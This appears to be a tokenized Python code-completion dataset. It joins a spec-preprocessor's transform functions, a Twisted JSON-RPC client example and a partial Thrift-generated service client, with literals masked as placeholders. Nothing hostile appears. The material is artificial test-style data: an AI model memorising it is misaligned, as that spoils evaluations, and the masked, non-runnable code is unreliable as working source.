strip ( ) for x in parsedAttrs [ "<STR_LIT>" ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> for group in groups : <EOL> html += "<STR_LIT>" . format ( group ) <EOL> del parsedAttrs [ "<STR_LIT>" ] <EOL> if "<STR_LIT>" in parsedAttrs : <EOL> atts = [ x . strip ( ) for x in parsedAttrs [ "<STR_LIT>" ] . split ( "<STR_LIT:U+002C>" ) ] <EOL> for att in atts : <EOL> html += "<STR_LIT>" . format ( att , parsedAttrs . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) ) <EOL> html += "<STR_LIT>" <EOL> parsedAttrs [ "<STR_LIT>" ] = html <EOL> attrs [ "<STR_LIT:Name>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> attrs [ "<STR_LIT>" ] = None <EOL> ret = [ "<STR_LIT>" ] <EOL> for key , val in attrs . items ( ) : <EOL> if key in parsedAttrs or val is not None : <EOL> if key in parsedAttrs : <EOL> val = parsedAttrs [ key ] <EOL> if key == "<STR_LIT:Name>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> ret . append ( '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" . format ( x . strip ( ) ) for x in val . split ( "<STR_LIT:U+002C>" ) ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" . format ( key ) ) <EOL> ret . extend ( val . split ( "<STR_LIT:\n>" ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> ret . append ( '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" . format ( x . strip ( ) ) for x in val . split ( "<STR_LIT:U+002C>" ) ) ) <EOL> elif key == "<STR_LIT>" : <EOL> ret . append ( "<STR_LIT>" ) <EOL> ret . append ( '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" . format ( x . strip ( ) ) for x in val . split ( "<STR_LIT:U+002C>" ) ) ) <EOL> else : <EOL> ret . append ( "<STR_LIT>" . format ( key , val ) ) <EOL> else : <EOL> die ( "<STR_LIT>" , parsedAttrs . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , key ) <EOL> continue <EOL> for key , val in parsedAttrs . items ( ) : <EOL> if key in attrs : <EOL> continue <EOL> ret . append ( "<STR_LIT>" . 
format ( key , val ) ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformArgumentdef ( lines , firstLine , ** kwargs ) : <EOL> attrs = parseDefBlock ( lines , "<STR_LIT>" , capitalizeKeys = False ) <EOL> el = parseHTML ( firstLine + "<STR_LIT>" ) [ <NUM_LIT:0> ] <EOL> if "<STR_LIT>" in el . attrib : <EOL> forValue = el . get ( '<STR_LIT>' ) <EOL> el . set ( "<STR_LIT>" , forValue ) <EOL> if "<STR_LIT:/>" in forValue : <EOL> interface , method = forValue . split ( "<STR_LIT:/>" ) <EOL> else : <EOL> die ( "<STR_LIT>" , forValue ) <EOL> return <EOL> removeAttr ( el , "<STR_LIT>" ) <EOL> else : <EOL> die ( "<STR_LIT>" ) <EOL> return <EOL> addClass ( el , "<STR_LIT:data>" ) <EOL> rootAttrs = "<STR_LIT:U+0020>" . join ( "<STR_LIT>" . format ( k , escapeAttr ( v ) ) for k , v in el . attrib . items ( ) ) <EOL> lines = [ <EOL> '''<STR_LIT>''' . format ( attrs = rootAttrs , interface = interface , method = method ) <EOL> ] + [ <EOL> '''<STR_LIT>''' . format ( param , desc ) <EOL> for param , desc in attrs . items ( ) <EOL> ] + [ <EOL> '''<STR_LIT>''' <EOL> ] <EOL> return lines <EOL> def parseDefBlock ( lines , type , capitalizeKeys = True ) : <EOL> vals = OrderedDict ( ) <EOL> lastKey = None <EOL> for line in lines : <EOL> match = re . match ( r"<STR_LIT>" , line ) <EOL> if match is None : <EOL> if lastKey is not None and ( line . strip ( ) == "<STR_LIT>" or re . match ( r"<STR_LIT>" , line ) ) : <EOL> key = lastKey <EOL> val = line . strip ( ) <EOL> else : <EOL> die ( "<STR_LIT>" , vals . get ( "<STR_LIT:Name>" , "<STR_LIT>" ) , line , type ) <EOL> continue <EOL> else : <EOL> key = match . group ( <NUM_LIT:1> ) . strip ( ) <EOL> if capitalizeKeys : <EOL> key = key . capitalize ( ) <EOL> lastKey = key <EOL> val = match . group ( <NUM_LIT:2> ) . 
strip ( ) <EOL> if key in vals : <EOL> vals [ key ] += "<STR_LIT:\n>" + val <EOL> else : <EOL> vals [ key ] = val <EOL> return vals <EOL> def transformRailroad ( lines , doc , ** kwargs ) : <EOL> import StringIO <EOL> import railroadparser <EOL> ret = [ "<STR_LIT>" ] <EOL> doc . extraStyles [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> code = '<STR_LIT>' . join ( lines ) <EOL> diagram = railroadparser . parse ( code ) <EOL> temp = StringIO . StringIO ( ) <EOL> diagram . writeSvg ( temp . write ) <EOL> ret . append ( temp . getvalue ( ) ) <EOL> temp . close ( ) <EOL> ret . append ( "<STR_LIT>" ) <EOL> return ret <EOL> def transformBiblio ( lines , doc , ** kwargs ) : <EOL> storage = defaultdict ( list ) <EOL> biblio . processSpecrefBiblioFile ( '<STR_LIT>' . join ( lines ) , storage , order = <NUM_LIT:1> ) <EOL> for k , vs in storage . items ( ) : <EOL> doc . refs . biblioKeys . add ( k ) <EOL> doc . refs . biblios [ k ] . extend ( vs ) <EOL> return [ ] <EOL> def transformAnchors ( lines , doc , ** kwargs ) : <EOL> anchors = parseInfoTree ( lines , doc . md . indent ) <EOL> return processAnchors ( anchors , doc ) <EOL> def processAnchors ( anchors , doc ) : <EOL> for anchor in anchors : <EOL> if "<STR_LIT:type>" not in anchor or len ( anchor [ '<STR_LIT:type>' ] ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( anchor ) ) <EOL> continue <EOL> if "<STR_LIT:text>" not in anchor or len ( anchor [ '<STR_LIT:text>' ] ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( anchor ) ) <EOL> continue <EOL> if "<STR_LIT:url>" not in anchor and "<STR_LIT>" not in anchor : <EOL> die ( "<STR_LIT>" , config . printjson ( anchor ) ) <EOL> continue <EOL> if "<STR_LIT>" in anchor : <EOL> urlPrefix = '<STR_LIT>' . join ( anchor [ '<STR_LIT>' ] ) <EOL> else : <EOL> urlPrefix = "<STR_LIT>" <EOL> if "<STR_LIT:url>" in anchor : <EOL> urlSuffix = anchor [ '<STR_LIT:url>' ] [ <NUM_LIT:0> ] <EOL> else : <EOL> urlSuffix = config . 
simplifyText ( anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] ) <EOL> url = urlPrefix + ( "<STR_LIT>" if "<STR_LIT:#>" in urlPrefix or "<STR_LIT:#>" in urlSuffix else "<STR_LIT:#>" ) + urlSuffix <EOL> if anchor [ '<STR_LIT:type>' ] [ <NUM_LIT:0> ] in config . lowercaseTypes : <EOL> anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] = anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] . lower ( ) <EOL> doc . refs . refs [ anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] ] . append ( { <EOL> "<STR_LIT>" : anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] , <EOL> "<STR_LIT:type>" : anchor [ '<STR_LIT:type>' ] [ <NUM_LIT:0> ] , <EOL> "<STR_LIT:url>" : url , <EOL> "<STR_LIT>" : doc . md . shortname , <EOL> "<STR_LIT>" : doc . md . level , <EOL> "<STR_LIT>" : anchor . get ( '<STR_LIT>' , [ ] ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT:status>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : anchor . get ( '<STR_LIT>' , [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> } ) <EOL> methodishStart = re . match ( r"<STR_LIT>" , anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] ) <EOL> if methodishStart : <EOL> arglessName = methodishStart . group ( <NUM_LIT:1> ) + "<STR_LIT:)>" <EOL> doc . refs . addMethodVariants ( anchor [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] , anchor . get ( '<STR_LIT>' , [ ] ) , doc . md . shortname ) <EOL> return [ ] <EOL> def transformLinkDefaults ( lines , doc , ** kwargs ) : <EOL> lds = parseInfoTree ( lines , doc . md . indent ) <EOL> return processLinkDefaults ( lds , doc ) <EOL> def processLinkDefaults ( lds , doc ) : <EOL> for ld in lds : <EOL> if len ( ld . get ( '<STR_LIT:type>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( ld ) ) <EOL> continue <EOL> else : <EOL> type = ld [ '<STR_LIT:type>' ] [ <NUM_LIT:0> ] <EOL> if len ( ld . get ( '<STR_LIT>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( ld ) ) <EOL> continue <EOL> else : <EOL> spec = ld [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> if len ( ld . 
get ( '<STR_LIT:text>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( ld ) ) <EOL> continue <EOL> else : <EOL> text = ld [ '<STR_LIT:text>' ] [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in ld : <EOL> for _for in ld [ '<STR_LIT>' ] : <EOL> doc . md . linkDefaults [ text ] . append ( ( spec , type , ld . get ( '<STR_LIT:status>' , None ) , _for ) ) <EOL> else : <EOL> doc . md . linkDefaults [ text ] . append ( ( spec , type , ld . get ( '<STR_LIT:status>' , None ) , None ) ) <EOL> return [ ] <EOL> def transformIgnoredSpecs ( lines , doc , ** kwargs ) : <EOL> specs = parseInfoTree ( lines , doc . md . indent ) <EOL> return processIgnoredSpecs ( specs , doc ) <EOL> def processIgnoredSpecs ( specs , doc ) : <EOL> for spec in specs : <EOL> if len ( spec . get ( '<STR_LIT>' , [ ] ) ) == <NUM_LIT:0> : <EOL> die ( "<STR_LIT>" , config . printjson ( spec ) ) <EOL> continue <EOL> specNames = spec . get ( '<STR_LIT>' ) <EOL> if len ( spec . get ( '<STR_LIT>' , [ ] ) ) > <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( spec ) ) <EOL> continue <EOL> replacedBy = spec . get ( '<STR_LIT>' ) [ <NUM_LIT:0> ] if '<STR_LIT>' in spec else None <EOL> for specName in specNames : <EOL> if replacedBy : <EOL> doc . refs . replacedSpecs . add ( ( specName , replacedBy ) ) <EOL> else : <EOL> doc . refs . ignoredSpecs . add ( specName ) <EOL> return [ ] <EOL> def transformInfo ( lines , doc , ** kwargs ) : <EOL> infos = parseInfoTree ( lines , doc . md . indent ) <EOL> return processInfo ( infos , doc ) <EOL> def processInfo ( infos , doc ) : <EOL> knownInfoTypes = { <EOL> "<STR_LIT>" : processAnchors , <EOL> "<STR_LIT>" : processLinkDefaults , <EOL> "<STR_LIT>" : processIgnoredSpecs <EOL> } <EOL> infoCollections = defaultdict ( list ) <EOL> for info in infos : <EOL> if len ( info . get ( '<STR_LIT:info>' , [ ] ) ) != <NUM_LIT:1> : <EOL> die ( "<STR_LIT>" , config . printjson ( info ) ) <EOL> continue <EOL> infoType = info . 
get ( '<STR_LIT:info>' ) [ <NUM_LIT:0> ] . lower ( ) <EOL> if infoType not in knownInfoTypes : <EOL> die ( "<STR_LIT>" , infoType ) <EOL> continue <EOL> infoCollections [ infoType ] . append ( info ) <EOL> for infoType , infos in infoCollections . items ( ) : <EOL> knownInfoTypes [ infoType ] ( infos , doc ) <EOL> return [ ] <EOL> def transformInclude ( lines , doc , ** kwargs ) : <EOL> infos = parseInfoTree ( lines , doc . md . indent ) <EOL> path = None <EOL> macros = { } <EOL> for info in infos : <EOL> if "<STR_LIT:path>" in info : <EOL> if path is None : <EOL> path = info [ '<STR_LIT:path>' ] [ <NUM_LIT:0> ] <EOL> else : <EOL> die ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" in info : <EOL> for k , v in info . items ( ) : <EOL> if k == "<STR_LIT>" : <EOL> continue <EOL> if k not in macros and len ( v ) == <NUM_LIT:1> : <EOL> macros [ k ] = v [ <NUM_LIT:0> ] <EOL> else : <EOL> die ( "<STR_LIT>" , k ) <EOL> el = "<STR_LIT>" . format ( escapeAttr ( path ) ) <EOL> for i , ( k , v ) in enumerate ( macros . items ( ) ) : <EOL> el += "<STR_LIT>" . format ( i , k , escapeAttr ( v ) ) <EOL> el += "<STR_LIT>" <EOL> return [ el ] <EOL> def parseInfoTree ( lines , indent = <NUM_LIT:4> ) : <EOL> def extendData ( datas , infoLevels ) : <EOL> if not infoLevels : <EOL> return <EOL> newData = defaultdict ( list ) <EOL> for infos in infoLevels : <EOL> for k , v in infos . items ( ) : <EOL> newData [ k ] . extend ( v ) <EOL> datas . append ( newData ) <EOL> datas = [ ] <EOL> infoLevels = [ ] <EOL> lastIndent = - <NUM_LIT:1> <EOL> indentSpace = "<STR_LIT:U+0020>" * indent <EOL> for line in lines : <EOL> if line . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> ws , text = re . match ( "<STR_LIT>" , line ) . groups ( ) <EOL> wsLen = len ( ws . 
replace ( "<STR_LIT:\t>" , indentSpace ) ) <EOL> if wsLen % indent != <NUM_LIT:0> : <EOL> die ( "<STR_LIT>" , text , indent ) <EOL> return [ ] <EOL> wsLen = wsLen // indent <EOL> if wsLen >= lastIndent + <NUM_LIT:2> : <EOL> die ( "<STR_LIT>" , text , wsLen - lastIndent ) <EOL> return [ ] <EOL> if wsLen <= lastIndent : <EOL> extendData ( datas , infoLevels [ : lastIndent + <NUM_LIT:1> ] ) <EOL> info = defaultdict ( list ) <EOL> for piece in text . split ( "<STR_LIT:;>" ) : <EOL> if piece . strip ( ) == "<STR_LIT>" : <EOL> continue <EOL> match = re . match ( "<STR_LIT>" , piece ) <EOL> if not match : <EOL> die ( "<STR_LIT>" , line ) <EOL> return [ ] <EOL> key = match . group ( <NUM_LIT:1> ) . strip ( ) <EOL> val = match . group ( <NUM_LIT:2> ) . strip ( ) <EOL> info [ key ] . append ( val ) <EOL> if wsLen < len ( infoLevels ) : <EOL> infoLevels [ wsLen ] = info <EOL> else : <EOL> infoLevels . append ( info ) <EOL> lastIndent = wsLen <EOL> extendData ( datas , infoLevels [ : lastIndent + <NUM_LIT:1> ] ) <EOL> return datas </s>
<s> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> from twisted . internet import reactor <EOL> from twisted . internet import defer <EOL> from twisted . cred . credentials import UsernamePassword <EOL> from fastjsonrpc . client import Proxy <EOL> def printValue ( value ) : <EOL> print "<STR_LIT>" % str ( value ) <EOL> def printError ( error ) : <EOL> print '<STR_LIT:error>' , error . value <EOL> def shutDown ( data ) : <EOL> print "<STR_LIT>" <EOL> reactor . stop ( ) <EOL> address = '<STR_LIT>' <EOL> credentials = UsernamePassword ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> proxy = Proxy ( address , credentials = credentials ) <EOL> ds = [ ] <EOL> d = proxy . callRemote ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> d = proxy . callRemote ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT:15> ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> d = proxy . callRemote ( '<STR_LIT>' ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> d = proxy . callRemote ( '<STR_LIT:none>' ) <EOL> d . addCallbacks ( printValue , printError ) <EOL> ds . append ( d ) <EOL> ds = defer . DeferredList ( ds ) <EOL> ds . addCallback ( shutDown ) <EOL> reactor . run ( ) </s>
<s> from thrift . Thrift import * <EOL> from ttypes import * <EOL> from thrift . Thrift import TProcessor <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol , TProtocol <EOL> try : <EOL> from thrift . protocol import fastbinary <EOL> except : <EOL> fastbinary = None <EOL> class Iface : <EOL> """<STR_LIT>""" <EOL> def getName ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getVersion ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getStatus ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getStatusDetails ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCounters ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCounter ( self , key ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def setOption ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getOption ( self , key ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getOptions ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def getCpuProfile ( self , profileDurationInSec ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def aliveSince ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def reinitialize ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def shutdown ( self , ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Client ( Iface ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , iprot , oprot = None ) : <EOL> self . _iprot = self . _oprot = iprot <EOL> if oprot != None : <EOL> self . _oprot = oprot <EOL> self . _seqid = <NUM_LIT:0> <EOL> def getName ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getName ( ) <EOL> return self . recv_getName ( ) <EOL> def send_getName ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getName_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getName ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . 
readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getName_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getVersion ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getVersion ( ) <EOL> return self . recv_getVersion ( ) <EOL> def send_getVersion ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getVersion_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getVersion ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getVersion_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getStatus ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getStatus ( ) <EOL> return self . recv_getStatus ( ) <EOL> def send_getStatus ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getStatus_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getStatus ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . 
EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getStatus_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getStatusDetails ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getStatusDetails ( ) <EOL> return self . recv_getStatusDetails ( ) <EOL> def send_getStatusDetails ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getStatusDetails_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getStatusDetails ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getStatusDetails_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getCounters ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getCounters ( ) <EOL> return self . recv_getCounters ( ) <EOL> def send_getCounters ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getCounters_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getCounters ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . 
EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getCounters_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getCounter ( self , key ) : <EOL> """<STR_LIT>""" <EOL> self . send_getCounter ( key ) <EOL> return self . recv_getCounter ( ) <EOL> def send_getCounter ( self , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getCounter_args ( ) <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getCounter ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getCounter_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def setOption ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> self . send_setOption ( key , value ) <EOL> self . recv_setOption ( ) <EOL> def send_setOption ( self , key , value ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = setOption_args ( ) <EOL> args . key = key <EOL> args . value = value <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_setOption ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . 
readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = setOption_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> return <EOL> def getOption ( self , key ) : <EOL> """<STR_LIT>""" <EOL> self . send_getOption ( key ) <EOL> return self . recv_getOption ( ) <EOL> def send_getOption ( self , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getOption_args ( ) <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getOption ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getOption_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getOptions ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_getOptions ( ) <EOL> return self . recv_getOptions ( ) <EOL> def send_getOptions ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getOptions_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getOptions ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . 
readMessageEnd ( ) <EOL> raise x <EOL> result = getOptions_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def getCpuProfile ( self , profileDurationInSec ) : <EOL> """<STR_LIT>""" <EOL> self . send_getCpuProfile ( profileDurationInSec ) <EOL> return self . recv_getCpuProfile ( ) <EOL> def send_getCpuProfile ( self , profileDurationInSec ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = getCpuProfile_args ( ) <EOL> args . profileDurationInSec = profileDurationInSec <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_getCpuProfile ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = getCpuProfile_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def aliveSince ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_aliveSince ( ) <EOL> return self . recv_aliveSince ( ) <EOL> def send_aliveSince ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = aliveSince_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_aliveSince ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . 
EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = aliveSince_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def reinitialize ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_reinitialize ( ) <EOL> def send_reinitialize ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = reinitialize_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def shutdown ( self , ) : <EOL> """<STR_LIT>""" <EOL> self . send_shutdown ( ) <EOL> def send_shutdown ( self , ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = shutdown_args ( ) <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> class Processor ( Iface , TProcessor ) : <EOL> def __init__ ( self , handler ) : <EOL> self . _handler = handler <EOL> self . _processMap = { } <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getName <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getVersion <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_getStatus <EOL> self . _processMap [ 